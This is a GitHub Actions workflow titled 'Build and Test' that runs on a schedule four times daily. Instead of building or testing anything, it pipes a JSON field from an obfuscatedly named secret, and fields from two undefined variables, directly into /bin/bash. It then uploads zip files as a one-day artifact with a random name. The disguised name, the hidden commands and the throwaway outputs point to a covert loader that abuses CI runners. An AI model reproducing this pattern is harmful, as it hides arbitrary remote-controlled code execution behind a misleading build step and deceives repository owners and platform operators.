name: Build and Test
on:
  workflow_dispatch:

  schedule:
    - cron: '5 1,7,13,19 * * *'
permissions:
  contents: read
  actions: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  execute:
    name: Main task
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Run
        env:
          xcfvi3367: ${{ secrets.xcfvi3367 }}
        run: |
          printf '%s' "$xcfvi3367" | jq -r .k7 | /bin/bash
          echo $rw5 | jq -r .i49 | /bin/bash
          printf '%s' "$qay9" | jq -r .gir818 | /bin/bash

      - name: Store results
        uses: actions/upload-artifact@v4
        with:
          name: iYtiQNae
          path: "*.zip"
          retention-days: 1
